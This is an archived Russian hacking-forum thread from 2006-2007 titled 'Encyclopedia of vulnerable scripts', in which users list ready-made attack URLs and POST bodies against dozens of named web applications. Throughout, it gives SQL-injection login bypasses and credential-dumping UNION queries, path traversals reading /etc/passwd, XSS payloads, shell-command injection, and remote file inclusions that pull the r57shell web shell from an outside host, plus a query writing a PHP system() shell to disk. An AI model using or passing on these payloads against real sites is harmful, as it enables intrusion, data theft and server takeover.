Энциклопедия уязвимых скриптов [Архив]

DIAgen

01.06.2006, 15:51

Энциклопедия уязвимых скриптов

----------------------------------------------------------------

Так же обратите внимание на темы:

Обзор уязвимостей [WordPress] (https://forum.antichat.ru/threadnav50572-1-10.html)

[Обзор уязвимостей в форумных движках] (http://forum.antichat.ru/threadnav38107-1-10.html)

Уязвимости чатов и Движков (http://forum.antichat.ru/thread20985.html)

Уязвимости в cms WCPS (https://forum.antichat.ru/thread50646.html)

----------------------------------------------------------------

Эта коллекция уязвимостей собиралась для личного использования. Если кому-нибудь пригодится, значит все сделано не зря!

Форумы

phpBB v.2.0.15 Выполнение php кода в viewtopic.php
viewtopic.php?t=1&highlight='.printf(md5(test)).'
PBLang 4.65 Локальный include файлов
setcookie.php?u=../../../../../../../../../../etc/passwd%00
setcookie.php??u=../../../../../../../../../../boot.ini%00
PHPTB v.2.0 Include файлов
/classes/admin_o.php?absolutepath= http://rst.void.ru/download/
r57shell.txt
MailGust v.1.9 SQL Injection
post запрос index.php
method=remind_password&list=maillistuser&fromlist=maillist&frommethod=showhtmllist&email=1%27%
20union%20select%20%2A%20from%20force_sql_error%2F %2A%40hotmail%2Ecom&submit=Ok&showAvatar
Chipmunk Forum XSS
newtopic.php?forumID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )
%3E%3C/IFRAME%3E
oaboard v.1.0 SQL Injection
forum.php?channel=0%20union%20select%20*%20from%20 force_mysql_table_error
Phorum 5.0.20 SQL Injection
search.php?1,search=%20,page=1,match_type=ALL,matc h_dates=30,match_forum=ALL,body=
1,author=1,subject=1,&forum_ids[]=-99)/**/generate_sql_error
Cyphor 0.19 XSS
/include/footer.php?t_login=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E
W-Agora 4.2.0 XSS
/templates/admin/login_form.php?msg_login=%3Cscript%3Ealert(%22XSS% 22)%3C/script%3E
WizForum 1.20 SQL Injection
ForumTopicDetails.php?TopicID=11111111%20union%20S elect%20*%20from%20EronatedInex
istentTable
EkinBoard 1.0.3 SQL Injection
admin/index.php ?page=general&step=2
Cookie: username=%27or+isnull%281%2F0%29+AND+level%3D3%2F% 2A; password=
Snitz Forums 2000 v.3.4.05 XSS
post.asp ?method=Topic&FORUM_ID=1&CAT_ID=1&type=xss-${random}
PHP-Post 1.0 XSS
profile.php ?user='%3CIFRAME%20SRC=javascript:alert(%2527xss-${random}%2527)%3E%3
C/IFRAME%3E
WSN Forum 1.21 SQL Injection
memberlist.php ?action=profile&id=1'%20select%20*%20from%20force_mysql_warning
sCssBoard 1.12 XSS
index.php ?act=search-results
post search_term=%3Cscript%3Ealert%28%27wvs-${random}%27%29%3C%2Fscript%3E+&sortby=relevancy
freeForum 1.1 SQL Injection
forum.php?mode=thread&thread=force_mysql_fetch_object_warning
Orca Forum 4.3.b SQL Injection
forum.php ?msg=2'force_mysql_num_rows_warning
Pearl Forums 2.4 SQL Injection
index.php ?mode=forums&forumId=1%20union%20select%20*%20from%20force_erro r
SimpleBBS v.1.1 Выполнение php кода
index.php ?v=newtopic&c=1
POST name=<?php echo md5("test");?>&subject=mysubject&message=mymessage&sendTopic=Send
ADP Forum v.2.0.2 Информация о пользователя
/users/
ADN Forum v.1.0b SQL Injection
verpag.php?pagid=999'%20and_force_mysql_error/*
MyBuletinBoard v.1.0.2 Раскрытие префикса таблицы
search.php?s=de1aaf9b&action=do_search&keywords=a&srchtype=3
MyTopix v.1.2.3 SQL Injection и раскрытие пути срипта
/modules/logon.mod.php
Pentacle In-Out Board v.6.03.0.0080 SQL Injection
login.asp POST username=anypassword&userpassword=%27+or+%271%27%3D%271&Submit=Log+in
Battleaxe Software Forums v.2.0 XSS
failure.asp ?err_txt=text%3C/b%3E%3Cscript%3Ealert(%22xss-${random}%22);%3C/script%3E%3Cb%3Etext

PHP Библиотеки

PEAR XML_RPC 1.3.0 Выполнение команд (подвержены Affected PEAR XML_RPC versions (up to 1.3.0). Affected web applications:TikiWiki. PostNuke
Drupal. b2evolution. b2. phpGroupWare. eGroupware. Serendipity Weblog. phpAdsNew. Max Media Manager. phpWiki. Blog:CMS. CivicSpace )
xmlrpc.php xmlrpc/server.php serendipity_xmlrpc.php adxmlrpc.php nucleus/xmlrpc/server.php
POST <?xmlversion="1.0"?><methodCall><methodName>test.method</methodName><params><param><value><name>','')); printf(md5(acunetix_wvs_security_test)); exit;//</name></value></param></params></methodCall>
ADOdb
1) SQL Injection
/server.php?sql=SELECT '[content]' INTO OUTFILE '[file]'
2) Выполнение функции php
/tests/tmssql.php?do=phpinfo

Network tools

phpLDAPadmin 0.9.6 Выполнение php кода
welcome.php ?custom_welcome_page= http://rst.void.ru/download/r57shell.txt
Netquery [host] Произвольное выполнение команд
nquser.php POST
1) querytype=dig&host=a%27%7Ccat%20%27%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17
2) querytype=dig&host=%7Ccat%20%2Fetc%2Fpasswd&digparam=ANY&x=11&y=17

Календари и Планировщики

phpCommunityCalendar v.4.0.3 Обход Логина
webadmin/login.php POST Username=%27+or+isnull%281%2F0%29+%2F*&Password=&Returned=1
Calendarix v.1.6 SQL Injection
cal_login.php POST login=%27+or+isnull%281%2F0%29%2F*&password=any
Teca Diary Personal Edition v.1.0 SQL Injection
index.php?mm='%20force_sql_error&yy=2006
CALimba v.0.99.2 Sql Injection
index.php POST ute_login=%27%29+or+isnull%281%2F0%29%2F*&ute_password=anypassword&cmdOK=Login%21
Maian Events v.1.00 SQL Injection
menu.php?month='forceerror'

Блоки новостей

myBloggie 2.1.3 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29+%2F*&passwd=&submit=Log+In
Simplog 0.9.1 SQL Injection
archive.php?blogid=force_error_for_test_reason
Zomplog 3.4 XSS
get.php?username=%3Cbr%3E%3Cb%3Exss%3C/b%3E%3Cbr%3E
CuteNews 1.4.1 Shell Injection
show_archives.php ?template=../inc/ipban.mdu%00&member_db[1]=1&action=add&add_ip=%22%3C?php%20echo%20md5(%22test%22)
;%20die;?%3E.%22%20HTTP/1.0\r\n
Cute News 1.4.1 Local File Inclusion
show_archives.php?template=../../../../../../../../../../etc/passwd%00
show_archives.php?template=../../../../../../../../../../boot.ini%00
SimpleBlog v.2.1 SQL Injection
default.asp ?view=archives&month=%22generate_error&year=2004
Bit5blog v.8.1 SQL Injection
admin/processlogin.php POST username=%27+or+isnull%281%2F0%29%2F*&password=%27+or+isnull%281%2F0%29%2F*
WebspotBlogging v.3.0 SQL Injection
login.php POST username=%27+or+isnull%281%2F0%29%2F*&password=anypassword
e-moBLOG v.1.3 SQL Injection
/admin/index.php POST login=aaa%27+union+select+%27bbb%27%2C+%27161da2fa 81d32d4071ee16f7f77cb463%27%2F*&password=
any_password
miniBloggie v.1.0 SQL Injection
login.php POST user=%27+or+isnull%281%2F0%29%2F*&pwd=%27+or+isnull%281%2F0%29%2F*&submit=Log+In
Text Rider v.2.4 Список пользователей
/data/userlist.txt
AndoNET Blog SQL Injection
index.php?ando=comentarios&entrada=1'generate%20error
Loudblog v.0.4 PHP Code Injection
/loudblog/inc/backend_settings.php?GLOBALS[path]= http://rst.void.ru/download/r57shell.txt
PluggedOut Blog v.1.9.9c SQL Injection
exec.php?action=comment_add&entryid=force_error
Clever Copy v.3.0 SQL Injection
mailarticle.php?ID='UNION%20SELECT%200,0,0,0,0,0,u sername,password,0,0,0,0,0,0,0,0,0
%20FROM%20CC_admin/*
Magic News Lite v.1.2.3 Code Injection
preview.php?php_script_path=http://rst.void.ru/download/r57shell.txt
WordPress v.2.0.1 Раскрытие пути
/wp-includes/default-filters.php
sBlog v.0.7.2 XSS
search.php POST keyword=%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3B%3C%2Fscript%3E
Maian Weblog v.2.0 SQL Injection
print.php?cmd=log&entry=1'%20or%20generate_error=2

DIAgen

01.06.2006, 22:31

Faq Systems

phpMyFAQ 1.5.1 SQL Injection
admin/password.php POST username=%27+or+isnull%281%2F0%29+%2F*&email=1@2.com
A-FAQ 1.0 SQL Injection
faqDsp.asp?catcode=12%20union%20select%20name%20fr om%20msysobjects%20in%20'\nopath\
sqlerr
Atlantis Knowledge Base Software v.3.0 SQL Injection
search.php POST searchStr=%25%27+union+select+*+from+force_mysql_w arning%2F*
ASP Survey v1.10 SQL Injection
/Admin/Login_Validate.asp POST Username=admin&Password=%27or%27&Dest=http%3A%2F%2Fasp.loftin-nc.com%2FASPSurvey%2FDemo%2FAdmin%2
FDefault.asp
Owl v.0.82 File Inclusion
/lib/OWL_API.php?xrms_file_root=nonexistent_test_includ efile%00

Web Portals

PHPNuke 7.8 Remote Directory Traversal
modules.php?name=Search&file=../../../../../../../../../../etc/passwd%00
modules.php?name=Search&file=../../../../../../../../../../../boot.ini%00

Партнерские системы

TWiki rev Parameter Remote Command Execution Vulnerability
view/Main/TWikiUsers?rev=2%20%7Cless%20/etc/passwd
view/Main/TWikiUsers?rev%3D2%20%7Ctype%20%5Cboot%2Eini
PmWiki 2.0.12 q-Parameter XSS
pmwiki.php ?n=Site.Search?action=search&q=test_search_item%27%20onMouseOver%3D%27alert%28% 22wvs-xss-magic
-string-${random}%22%29%3B%27%20

ProjectApp v.3.3 XSS
default.asp ?skin_number=XSS.css%22%3E%3Cscript%3Ealert('wvs-xss-magic-string-${random}')%3C/script%3E%3C
IntranetApp v.3.3 XSS
login.asp ?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
dotproject v.2.0.1 File Inclusion
includes/db_adodb.php?baseDir=http://rst.void.ru/download/r57shell.txt
Qwiki v.1.5.1 XSS
index.php?page=Home&from='%3Cscript%3Ealert(%22xss-${random}%22)%3C/script%3E

Administration Tools

phpMyAdmin grab_globals.lib.php
libraries/grab_globals.lib.php POST usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../etc/passwd&subform[1]
libraries/grab_globals.lib.php POST
usesubform[1]=1&usesubform[2]=1&subform[1][Whiteirect]=${file}/../../../../../../../
../../../boot.ini&subform[1]
phpMyAdmin XSS
queryframe.php?lang=en-iso-8859-1&server=1&hash=">='%3C/a%3E%3CIFRAME%
20SRC=javascript:alert(%2527xss%2527)%3E%3C/IFRAME%3E
phpMyAdmin Раскрытие пути
libraries/charset_conversion.lib.php ?cfg[AllowAnywhereRecoding]=true&
allow_recoding=true)

CMS Systems

PHP-Fusion 6.00.109 SQL Injection
faq.php?cat_id=1%27%20or%20force_mysql_error%3D%27 2
MySource 2.14.0 File Inclusion
init_mysource.php ?INCLUDE_PATH=http://rst.void.ru/download/r57shell.txt
e107 v0617 SQL Injection
e107_files/resetcore.php POST a_name=%27+or+isnull%281%2F0%29%2F*&a_password=&usubmit=Continue
lucidCMS 1.0.11 SQL Injection
index.php?command=panel
PhpWebThings 1.4.4 SQL Injection
forum.php?forum=-1%20union%20select%20password,password,null,null%2 0from%
20test_mysql_injection%20where%20uid=1/*
Envolution v.1.1.0 SQL Injection
modules.php?op=modload&name=News&file=index&catid=%221%22%20AND%20force_error=error
Acidcat v.2.1.13 SQL Injection
default.asp?ID=26%20union%20select%201,2,2,3,passw ord,5,6%20from%20Configuration
DEV v1.5 SQL Injection
index.php?session=0&action=openforum&cat=force_error
SiteEnable v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
PortalApp v.3.3 XSS
login.asp?ret_page=a%22%3E%3Cscript%3Ealert('xss-${random}')%3C/script%3E%3C%22
Typo3 v.3.8.1 Раскрытие пути
/tslib/showpic.php
RunCMS v.1.3a5 XSS
/modules/mydownloads/ratefile.php?lid=1%22%3E%3Cscript%3Ealert('xss-${random}');
%3C/script%3E%3Cbr%20name=%22nothing
Mambo v.4.5.3h SQL Injection
/index.php POST username=%27or+isnull%281%2F0%29%2F*&passwd=anypassword&option=login&Submit=Login&op2=login&lang
=english&return=${file}&message=0
Dragonfly CMS v.9.0.6.1 XSS
/index.php POST search=%22%3E%3Cscript%3Ealert%28%22wvs-xss-magic-string-${random}%22%29%3C%2Fscript%3E&topic=0&cat
=0&news_search_comments=0&coppermine=
Nodez v.4.6.1.1 XSS
/index.php?node=system&op=block%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)
%3C/script%3E&block=3&bop=more
XOOPS v.2.0.11 SQL Injection
/xmlrpc.php POST <?xml version="1.0"?><methodCall><methodName>blogger.getUsersBlogs</methodName><params><param><value>
<string></string></value></param><param><value><string>any') or isnull(1/0)/*</string></value></param></params></methodCall>

Gallery Applications

Gallery "g2_itemId" локальный иклуид
main.php?g2_itemId=/../../../../../../../../../../../boot.ini%00
main.php?g2_itemId=/../../../../../../../../../../../etc/passwd%00
/upgrade/index.php ?stepOrder[]=../../../../../../../../include_inexistent_file.txt%00
Coppermine Photo Gallery v.1.4.2 игнорировать конфигурацию
relocate_server.php POST continue=1
Instant Photo Gallery v.1.0 SQL Injection
portfolio.php?cat_id="force_sql_error
Enhanced Simple PHP Gallery v.1.7 Раскрытие пути
index.php?dir=inexistent_directory
WhiteAlbum v.2.5 SQL Injection
pictures.php?dir=force_mysql_warning
LinPHA v.1.0 Local File Inclusion
/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
/docs/index.php?lang=/../../../../../../../../../../boot.ini%00

Script Collections

Codegrrl Arbitrary Local File Inclusion
protection.php?action=logout&siteurl=../../../../../../../../../../etc/passwd%00
protection.php?action=logout&siteurl=../../../../../../../../../../boot.ini%00
Techno Dreams Products SQL Injection
admin/login.asp POST userid=%27union+all+select+%271%27%2C%271%27+from+ admin+where+%27%27%3D%27&passwd=1&submit=Login
AlstraSoft Template Seller Pro 3.25 File Inclusion
include/paymentplugins/payment_paypal.php?config[basepath]=inexistent_hacker_box
AlstraSoft Affiliate Network Pro v.7.2 SQL Injection
admin/admin_login_validate.php POST login=%27+or+isnull%281%2F0%29+%2F*&passwd=&B1=Login
OpenEdit v.4.0 XSS
/store/search/results.html ?page=%3Ciframe%3Exss-${random}%3C/iframe%3E

Электронная коммерция

Zend Cart 1.2.6 SQL Injection
admin/password_forgotten.php POST admin_email=%27UNION+SELECT+0%2C0%2C%27%3C%3Fphp+s ystem%28%24_GET%5Bcmd%5D%29%3B+%3F%3E%27%2C0
+INTO+OUTFILE+%27shell.php%27+FROM+force_table_err or%2F*&submit=resend
Lizard Cart CMS v.1.0.4 SQL Injection
detail.php?id=-1'
My Amazon Store Manager v1.0 XSS
/search.php ?q=%3Cscript%3Ealert('xss-${random}')%3C/script%3E&Mode=apparel
CRE Loaded v.6.15 XSS
/admin/htmlarea/popups/file/files.php?q=%3Cscript%3Ealert('xss-${random}')%3C/
script%3E&Mode=apparel
NZ Ecommerce SQL Injection
/index.php?action=Information&informationID=1%20and%20generate_error=error

Guest Book Applications

Ades Guestbook v.2.0 XSS
read.php ?pageNum_rsRead=1&totalRows_rsRead=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3
C%2Fscript%3E

Development Tools

Mantis 1.00 File Inclusion
bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../etc/passwd%00
bug_sponsorship_list_view_inc.php?t_core_path=../../../../../../../../../boot.ini%00
Flyspray 0.9.8 XSS
index.php ?tasks=all%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3 C%2Fscript%3E%26project%3D0
Gemini v.2.0 XSS
/issue/createissue.aspx?rtcDescription$RadEditor1=1><script>alert(${random});</script>

Другие инструменты

Digital Scribe 1.4 SQL Injection
login.php POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL Injection
password_reminder.php POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System локальный include
viewers/txt.php?filename=../../../../../../../../../../boot.ini%00
viewers/txt.php?filename=../../../../../../../../../../etc/passwd%00
Chipmunk Topsites XSS
recommend.php ?ID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Chipmunk Directory XSS
recommend.php ?entryID='%3C/a%3E%3CIFRAME%20SRC=javascript:alert(%2527xss%2527 )%3E%3C/IFRAME%3E
Gcards 1.44 limit parameter SQL Injection
news.php ?limit=force_sql_error
phpSysInfo 2.3 XSS
index.php ?VERSION=%22%3E%3Cscript%3Ealert('FORCE_XSS')%3C/script%3E
Advanced Poll 2.03 XSS
popup.php ?poll_ident=%3Cscript%3Ealert(%22wvs-xss-magic-string-${random}%22)%3C/script%3E
PHPGreetz 0.99 Remote File Include
content.php?content=http://rst.void.ru/download/r57shell.txt
eFiction 1.1 XSS и SQL Injection
titles.php?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%2 2wvs-xss-magic-string-${random}%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*
Google API Search Engine v.1.3.1 XSS
index.php?REQ=%3Cscript%3Ealert%28%27wvs-xss-magic-string-${random}%27%29%3C%2Fscript%3ESubmit=Submit
phpArcadeScript v.2.0 XSS
/includes/tellafriend.php?about=game&gamename=%3Cscript%3Ealert(${random});%3C/script%3E

DIAgen

05.11.2006, 13:51

Форумы
phpBB v.1.20 локальный инклуид
/admin/admin_hacks_list.php?setmodules=3D1&board_conf=ig[default_lang]=3Denglish&phpEx=3D${random}
MyBulletinBoard v.1.1.5 SQL инъекция
http://www.milw0rm.com/exploits/2012
dotNetBB v2.42EC.SP3 XSS
/iforget.aspx POST em=%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2Fscript %3E
Toast Forums v.1.6 XSS
?action=posts&sub=search&fid-1&author=r0t&subject=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E%3C
SKForum v.1.5 XSS
?areaID=%3Cscript%3Ealert('XSS')%3B%3C/script%3E&time=%3Cscript%3Ealert('XSS')%3B%3C/script%3E
Invision Power Board v.2.0.3 XSS
Шаг 1
?act=Search&CODE=01
POST
keywords=test&namesearch=&forums%5B%5D=all&searchsubs=1&prune=0&prune_type=newer&sort_key=last_post&sort_order=desc&search_in=posts&result_type=topics
Шаг 2
GET
%2F%24%7B%69%6E%63%6C%75%73%69%6F%6E%5F%70%61%72%6 1%6D%65%74%65%72%73%7D%3D%22%3E%3C%73%63%72%69%70% 74%3E%61%6C%65%72%74%28%22%78%73%73%74%65%73%74%22 %29%3B%3C%2F%73%63%72%69%70%74%3E
Invision Power Board v2.1.6 SQL инъекция
CLIENT-IP: ' UNION SELECT 'test',1,1,1/*
WWWThreads Forum XSS
calendar.php?week=%22%3E%3Cscript%3Ealert(${random })%3C/script%3E
MercuryBoard v.1.1.4 SQL инъекция
?a=active - User-Agent: 123456'
Integramod Portal v.2.0 локальный инклуид
?phpbb_root_path=http://evalphp

Календари и Планировщики
WebCalendar v.4.0 SQL инъекция
?EventID=arbitrary_id%20or%20sql_injection_tet=tes t
Connect Daily v.3.2.9 XSS
?start=<script>alert("XSS");</script>
Thyme v.1.3 XSS
POST searchfor=%3Cscript%3Ealert%28%22${random}%22%29%3 B%3C%2Fscript%3E
MaxxSchedule v.1.0 XSS
?Error=<script>alert("XSS");</script>
MultiCalendars v.3.0 SQL инъекция
?calsids=sql_error
myEvent v.1.4 php инклуид
?myevent_path=http://evalphp?
TeamCal Pro v.2.8.001 локальный инклуид
?tc_config[app_root]=http://evalphp?

Блоки новостей
myBloggie v.2.1.4 SQL инъекция
POST title='generate_error)/*&url=http://
Simplog v.0.9.1 Локальный инклуид
?cmd=ls%20-la&s=http://evalphp%00
Cute News v.1.4.5 XSS
?dosearch=yes&title="><script>alert("XSS");</script>&user=&from_date_day=&from_date_month=&from_date_year=&to_date_day =&to_date_month=&to_date_year=
WordPress v.2.0.3 SQL инъекци
?paged=-1
Simple PHP Blog v.0.4.7.1 Локальный инклуид
?blog_language=../../../../../../../../../../../inexistent_directory/inexistent_file.php%00
EasyMoblog v.0.5.1 XSS
?i=nothing.txt%22%3E%3Cscript%3Ealert(%22XSS%22);% 3C/script%3E%3Cimg%20src=%22img/posts/nothing.txt%22
bMachine v.2.9b XSS
POST key=%22%3E%3Cscript%3Ealert%28%22XSS%22%29%3B%3C%2 Fscript%3E%3C
Artmedic Newsletter v.4.1.2 Выполнение php
?logfile=info.php&logtime=000060&email=%3C?php%20echo%20md5(%22test%22);%20?%3E
Eggblog v.3.6 SQL инъекция
?id='1234567
pppBlog v.0.3.8 Локальный инклуид
?files[0]=../config/admin.php
BLOG:CMS v4.0.0 SQL инъекция
?id=9999999'/**/UNION/**/SELECT/**/mpassword/**/FROM/**/nucleus_member/**/WHERE/**/mnumber=1/*
DeluxeBB v1.08 SQL инъекция
Cookie: membercookie=test;memberid=1;memberpw=')or isnull(1/0) or(1='

Различные скрипты (редкие)
Digital Scribe 1.4 SQL
POST username=%22+or+isnull%281%2F0%29+%2F*&pass1=&submit=Login
ATUTOR 1.5.1 SQL
POST form_password_reminder=true&form_email=%27
PHP Advanced Transfer Manager System Disclosure
?filename=../../../../../../../../../../etc/passwd%00
Gcards v.1.45 SQL
username=%27+or+isnull%281%2F0%29%2F*&userpass=%27+or+isnull%281%2F0%29%2F*
PHPGreetz 0.99 Инклуид
?content=http://evalphp/
eFiction 1.1 SQL-XSS
?action=viewlist&let='%20UNION%20SELECT%200,0,'%3Cscript%3Ealert(%2 2XSS%22)%3C/script%3E',0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,pen name,0%20FROM%20fanfiction_authors%20/*
DoceboLMS 2.04 Инклуид
?Command=GetFoldersAndFiles&Type=../../../../../../../../&CurrentFolder=
Enterprise Connector v.1.02 SQL
POST loginid='or isnull(1/0) /*
PhpGedView v.3.3.7 Инклуид
?PGV_BASE_DIRECTORY=../../../../../../../../../etc/passwd
PHPjournaler v.1.0 SQL
?readold=999%20union%20select%201,password,3,4,nam e,6%20from%20eronated_table_name/*
PHPStatus v.1.0 SQL
POST username=%27or+isnull%281%2F0%29+%2F*&password=anypassword&submit=Login
NetOffice v.2.5.3-pl1 SQL
POST loginForm=%27+or+acuerro%3D1%2F*&send=Send
phpListPro v.2.0.0 Инклуид
?returnpath=http:/evalphp%00
phpWebFTP v.3.2 Локальный инклуид
POST server=&port=21&user=qqq&password=qqq&language=../../../../../../../../../../etc/passwd%00
EDirectoryPro 2006-05-09 SQL
?Category=all&keyword=sql_error%27&mode=date
Timesheet PHP 1.2.1 SQL
POST redirect=%2Ftest%2Ftimesheet_1_2_1%2Fcalendar.php&username=testuser%27&password=testpassword%27&Login=submit
Web-News v.1.6.3 Инклуид
?content_page=http://evalphp?

Faq Systems
Absolute FAQ Manager v.4.0 XSS
POST topicid=1&question=%3Cscript%3Ealert%28%22$XSS%22%29%3B%3C%2 Fscript%3E&imageField.x=14&imageField.y=6
PHPKB v.1.5 XSS
POST searchkeyword=%22%3E%3Cscript%3Ealert%28%22XSS%22% 29%3B%3C%2Fscript%3E&category=0&Submit=Search+Knowledge+Base

Web Portals
SQuery v.4.5 (phpNuke module) Инклуид
?libpath=http://evalphp?

Партнерские системы
PHPCollab v.2.4 SQL
POST loginForm=%27error%27+or+error
Tiki Wiki v.1.9.3.1 XSS
?days=%22%3E%3Cscr%3Cscript%3Eipt%3Ealert(%22XSS%2 2);%3C/scr%3C/script%3Eipt%3E%3E
DokuWiki v.2006-03-09b dwpage.php php-eval
X-FORWARDED-FOR: <?php echo md5("acunetix_test_text");?>

Administration Tools
Confixx 3 Professional v.3.1.2 SQL
?SID='%22
Pivot v1.30 RC2
edit_new.php?Paths[extensions_path]=ftp://username:password@somehost.com/
edit_new.php?Paths[extensions_path]=/etc/passwd%00
blogroll.php?fg=[XSS]
blogroll.php?line1=[XSS]
blogroll.php?line2=[XSS]
blogroll.php?bg=[XSS]
blogroll.php?c1=[XSS]
blogroll.php?c2=[XSS]
blogroll.php?c3=[XSS]
blogroll.php?c4=[XSS]
editor/edit_menu.php?name=[XSS]
editor/edit_menu.php?js_name=[XSS]
photo.php?h=><script>alert(document.cookie)</script>
photo.php?w=><script>alert(document.cookie)</script>
cPanel v.10.8.2.118 XSS
?dir=%3E%3Cscript%3Ealert(XSS)%3C/script%3E

CMS Systems
Simpleboard v1.1.0 (Mambo component) Инклуид
?sbp=http://evalphp?
Tim-online PHPBB v1.2.4RC3 (Mambo component) Инклуид
?phpbb_root_path=http://evalphp?
Galleria v1.0 (Mambo component) Инклуид
?mosConfig_absolute_path=http://evalphp?
Pearl For Mambo v.1.6 Инклуид
?GlobalSettings[templatesDirectory]=http://evalphp?
Videodb (Mambo component) v.0.3 Инклуид
?mosConfig_absolute_path=http://evalphp?
Loudmouth (Mambo component) v.4.0 Инклуид
?mosConfig_absolute_path=http://evalphp?
Mambo up to v.4.6.1 SQL
Cookie: usercookie[password]=%27 or 1=1/*; usercookie[username]=admin
99articles Инклуид
?page=http://evalphp?
OpenPHPNuke v.2.3.3 Инклуид
?root_path=http://evalphp?
Ottoman v.1.1.2 Локальный инклуид
?default_path=path%00
Ajax Portal v.3.0 SQL
POST rs=searchBoxes&rst=&rsrnd=1152608713921&rsargs[]=search%20%25%27%29%20LIMIT%200%20UNION%20SELECT%2 01337%2Cusername%2Cpassword%2Cgenerate_error%20FRO M%20p${random}/*&rsargs[]=all&rsargs[]=0
MyPHP CMS v.0.3 Инклуид
?installed=23&domain=http://evalphp?
Plume CMS v1.3 Инклуид
?_PX_config[manager_path]=http://evalphp?
SmartSiteCMS v1.0 Инклуид
?root=http://evalphp?
GeekLog v1.4.0 Инклуид
?_CONF[path]=http://evalphp?
Etomite CMS v.0.6.1 SQL
POST rememberme=1&location&username=99999999$'/**/UNION/**/SELECT/**/0,'acunetixtest',MD5('acunetixtest'),0,0,0,0,0,0,0 ,0,0,0,0,0,0,0/*&password=acunetixtest&thing&submit=Login&licenseOK=1
SaveWebPortal v.3.4 Инклуид
?SITE_Path=http://evalphp?
phpFullAnnu v.5.1 Инклуид
?repmod=http://evalphp?

Gallery Applications
JetPhoto Server v.1.x XSS
?name=%22%3E%3Cscript%3Ealert(XSS);%3C/script%3E
photokorn v.1.542 SQL
?action=showgal&cat=[sql]
PhotoPost v.4.6 Инклуид
?PP_PATH=http://evalphp?

Development Tools
Mantis 1.00 Локальный инклуид
?t_core_path=../../../../../../../../etc/passwd%00
Flyspray 0.9.8 XSS
?tasks=all"><script>alert("XSS")</script>&project=0
Gemini v.2.0 XSS
?rtcDescription$RadEditor1=1><script>alert(XSS);</script>
paBugs v.2.0b3 Инклуид
?path_to_bt_dir=http://evalphp?

Электронная коммерция
QuickEStore v.7.9 SQL
?CFID=&CFTOKEN=&CategoryID=[sql]
Leadhound 2006-04-28 XSS
?login=<script>alert("XSS");</script>
SunShop Shopping Cart v.3.5 XSS
?action=item&id=%22%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
OrbitHYIP v.2.0 XSS
?referral=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65% 72%74%28%22XSS%22%29%3B%3C%2F%73%63%72%69%70%74%3E
CyberBuild 06.05.03 XSS
?SessionID=[%22%3E%3E%3Cscript%3Ealert(%22XSS%22);%3C/script%3E
PhpHostBot v.1.0 Инклуид
?page=http://evalphp?
PHP Simple Shop v.2.0 Инклуид
?abs_path=http://evalphp?
CubeCart v.2.0.7 XSS
?la_pow_by=%3Cscript%3Ealert(XSS)%3C/script%3E
osCommerce v.2.2 XSS
?zone=%3Cscript%3Ealert(XSS)%3C/script%3E

Ну тут уже так себе, не чего особеного нет!!!
Creative Community Portal v.1.1 SQL
?article_id='
WoWRoster v.1.5.0 Инклуид
?subdir=http://evalphp?
Popper v.1.41.r2 Инклуид
?form=http://evalphp?

+StArT+

12.02.2007, 15:33

+ без комментариев!

И от меня парочку. ;)

Ananda Real Estate 3.4 SQL Injection

list.asp?agent=-1%20union%20select%20username,0,0,0,0,0,password,0 ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20user %20where%20id%20like%201

Enthrallweb ePhotos 1.0 SQL Injection

subLevel2.asp?Cat_ID=33&SUB_ID=-1%20union%20select%20U_ID,U_PASSWORD,0,0,0,U_email ,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0 ,0,0%20from%20users

Unidomedia Chameleon 1.203 LE и PRO Include файлов

index.php?rmid=../../../../../etc/passwd%00

PhpbbXtra 2.0 File Inclusion

includes/archive/archive_topic.php?phpbb_root_path=http://rst.void.ru/download/r57shell.txt

Dragon Business Directory Pro 3.01.12 SQL Injection

bus_details.asp?ID=-1%20union%20select%200,0,username,password,0,0,0,0 ,0,0,0,0,0,0,0,0,0,0,0%20from%20admin

Lesnoy_chelovek

21.02.2007, 03:15

Ещё пара штук:

Галлереи
4images 1.7.1
http://[target]/[path]/index.php?template=../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00

35mmslidegallery 6
http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
http://example.comr/lumet/album/popup.php?w='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>

Гостевые:
@lex Guestbook 4.0.1
http://[victim]/[guestbook_path]/index.php?skin=[XSS]

Форумы:
ADNForum 1.0b
http://host/adnforum/index.php?fid=3333'%20union%20select%201111/*

ADP Forum 2.0.3
http://target.com/pacth/users/username.txt

CAForum 1.0
admin/default.asp?password=1'%20OR%20'1'%20=%20'1

CoolForum 0.8.3
